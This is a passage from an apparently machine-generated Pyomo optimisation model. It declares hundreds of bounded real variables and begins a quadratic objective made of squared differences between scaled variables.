m.x946 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x947 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x948 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x949 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x950 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x951 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x952 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x953 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x954 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x955 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x956 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x957 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x958 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x959 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x960 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x961 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x962 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x963 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x964 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x965 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x966 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x967 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x968 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x969 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x970 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x971 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x972 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x973 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x974 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x975 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x976 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x977 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x978 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x979 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x980 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x981 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x982 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x983 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x984 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x985 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x986 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x987 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x988 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x989 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x990 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x991 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x992 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x993 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x994 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x995 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x996 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x997 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x998 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x999 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1000 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1001 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1002 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1003 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1004 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1005 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1006 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1007 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1008 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1009 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1010 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1011 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1012 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1013 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1014 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1015 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1016 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1017 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1018 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1019 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1020 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1021 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1022 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1023 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1024 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1025 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1026 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1027 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1028 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1029 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1030 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1031 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1032 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1033 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1034 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1035 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1036 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1037 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1038 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1039 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1040 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1041 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1042 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1043 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1044 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1045 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1046 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1047 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1048 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1049 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1050 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1051 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1052 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1053 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1054 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1055 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1056 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1057 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1058 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1059 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1060 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1061 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1062 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1063 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1064 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1065 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1066 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1067 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1068 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1069 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1070 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1071 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1072 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1073 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1074 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1075 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1076 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1077 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1078 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1079 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1080 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1081 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1082 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1083 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1084 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1085 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1086 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1087 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1088 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1089 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1090 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1091 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1092 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1093 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1094 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1095 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1096 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1097 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1098 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1099 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1100 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1101 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1102 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1103 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1104 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1105 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1106 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1107 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1108 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1109 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1110 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1111 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1112 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1113 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1114 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1115 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1116 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1117 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1118 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1119 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1120 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1121 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1122 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1123 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1124 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1125 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1126 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1127 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1128 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1129 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1130 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1131 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1132 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1133 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1134 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1135 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1136 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1137 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1138 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1139 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1140 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1141 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1142 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1143 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1144 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1145 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1146 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1147 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1148 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1149 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1150 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1151 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1152 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1153 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1154 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1155 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1156 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1157 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1158 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1159 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1160 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1161 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1162 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1163 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1164 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1165 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1166 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1167 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1168 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1169 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1170 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1171 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1172 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1173 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1174 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1175 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1176 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1177 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1178 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1179 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1180 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1181 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1182 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1183 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1184 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1185 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1186 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1187 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1188 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1189 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1190 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1191 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1192 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1193 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1194 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1195 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1196 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1197 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1198 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1199 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1200 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1201 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1202 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1203 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1204 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1205 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1206 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1207 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1208 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1209 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1210 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1211 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1212 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1213 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1214 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1215 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1216 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1217 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1218 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1219 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1220 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1221 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1222 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1223 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1224 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1225 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1226 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1227 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1228 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1229 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1230 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1231 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1232 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1233 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1234 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1235 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1236 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1237 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1238 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1239 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1240 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1241 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1242 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1243 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1244 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1245 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1246 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1247 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1248 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1249 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1250 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1251 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1252 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1253 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1254 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1255 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1256 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1257 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1258 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1259 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1260 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1261 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1262 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1263 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1264 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1265 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1266 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1267 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1268 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1269 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1270 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1271 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1272 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1273 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1274 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1275 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1276 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1277 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1278 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1279 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1280 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1281 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1282 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1283 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1284 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1285 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1286 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1287 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1288 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1289 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1290 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1291 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1292 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1293 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1294 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1295 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1296 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1297 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1298 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1299 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1300 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1301 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1302 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1303 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1304 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1305 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1306 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1307 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1308 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1309 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1310 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1311 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1312 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1313 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1314 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1315 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1316 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1317 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1318 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1319 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1320 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1321 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1322 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1323 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1324 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1325 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1326 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1327 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1328 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1329 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1330 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1331 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1332 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1333 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1334 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1335 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1336 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1337 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1338 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1339 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1340 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1341 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1342 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1343 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1344 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1345 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1346 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1347 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1348 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1349 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1350 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1351 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1352 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1353 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1354 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1355 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1356 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1357 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1358 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1359 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1360 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1361 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1362 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1363 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1364 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1365 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1366 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1367 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1368 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1369 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1370 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1371 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1372 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1373 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1374 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1375 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1376 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1377 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1378 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1379 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1380 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1381 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1382 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1383 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1384 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1385 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1386 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1387 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1388 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1389 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1390 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1391 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1392 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1393 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1394 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1395 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1396 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1397 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1398 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1399 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1400 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1401 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1402 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1403 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x1404 = Var(within=Reals,bounds=(0,0),initialize=0)
m.obj = Objective(expr=0.00789741742983861*(3.98750108076342*((8.11690209768664*m.x28 - 8.11690209768664*m.x1)**2 + (1.3
*m.x2 - 1.3*m.x1)**2) + 3.98750108076342*((8.11690209768664*m.x29 - 8.11690209768664*m.x2)**2 + (
1.3*m.x3 - 1.3*m.x2)**2) + 3.98750108076342*((8.11690209768664*m.x30 - 8.11690209768664*m.x3)**2
+ (1.3*m.x4 - 1.3*m.x3)**2) + 3.98750108076342*((8.11690209768664*m.x31 - 8.11690209768664*m.x4)
**2 + (1.3*m.x5 - 1.3*m.x4)**2) + 3.98750108076342*((8.11690209768664*m.x32 - 8.11690209768664*
